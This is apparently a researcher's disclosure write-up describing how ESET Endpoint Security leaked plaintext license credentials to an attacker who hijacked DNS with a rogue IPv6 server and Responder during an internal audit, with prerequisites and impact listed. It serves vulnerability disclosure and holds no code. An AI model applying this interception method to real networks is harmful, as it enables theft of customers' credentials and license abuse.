ESET Endpoint Security credentials theft
The title should have been Improper check of definitions updates in ESET Endpoint security leads to enterprise credentials theft, but this seemed a bit long, isn’t it ?
I submitted what I believe to be a vulnerability in a confidential report to ESET first, but finally received an answer mentioning this was not eligible for a bug bounty.
A vulnerability leveraging quite similar behaviours was reported back on 2016 on a different perimeter : https://www.cvedetails.com/cve/CVE-2016-9892/
The vulnerability reported here allows an attacker who has a foothold in an organization using ESET to passively steal the ESET license as well as ESET License Administrator credentials (https://ela.eset.com/LicenseOwner/Converter)
The test was conducted on a Windows 10 21h1 computer, running a ESET Endpoint Security 7.32.2041.0
At the moment, I have all the reasons to believe this behaviour can be reproduced against any version of ESET Endpoint Security.
During a security audit of an internal infrastructure, I was trying to hijack DNS traffic through a rogue IPv6 DNS beside Responder waiting for some employees to log-in somewhere. However, what happened was one instance of ESET Endpoint Security on the network tried to update its database by contacting pico.eset.com, sending me some plain-text credentials. The site seems to have an SSL certificate with an invalid Common Name (update.eset.com instead of pico.eset.com).
Take note in the meantime that this website seems to be accessible as well on plain-text HTTP. I believe it to be an issue in itself.
For the following, I have not been able to determine if I was able to capture the credentials because ESET tried to connect to pico.eset.com on port 80 or if it tried port 443 and did not perform a TLS/SSL check before, leading to the MITM attack success.
When presented a basic auth form by Responder following the DNS IPv6 spoofing, ESET sent the plaintext credentials with the username of the syntax “EAV-XXXXXXXXXX” as well as the password.
These credentials can be reused to manually on the License Manager URL available here: https://ela.eset.com/LicenseOwner/Converter. Then, licenses can be generated as follows:
- A computer in the same network than your target on which you have administrator rights to use tools such as Responder or Wireshark
- Nothing else (but it is easier if your target responds to Netbios/LLMNR or has no static IPv6 DNS setup, otherwise a simple packet sniffer could do the job).
The target (individual or company) will get its licensing information stolen and the attacker can issue licenses for himself. Perhaps is there some other usage for the credentials that I didn’t identify yet. No impact for ESET company, only an impact for customers ==> Additional costs on the licenses or licenses expiration by over-usage.
Definitely not rocket science…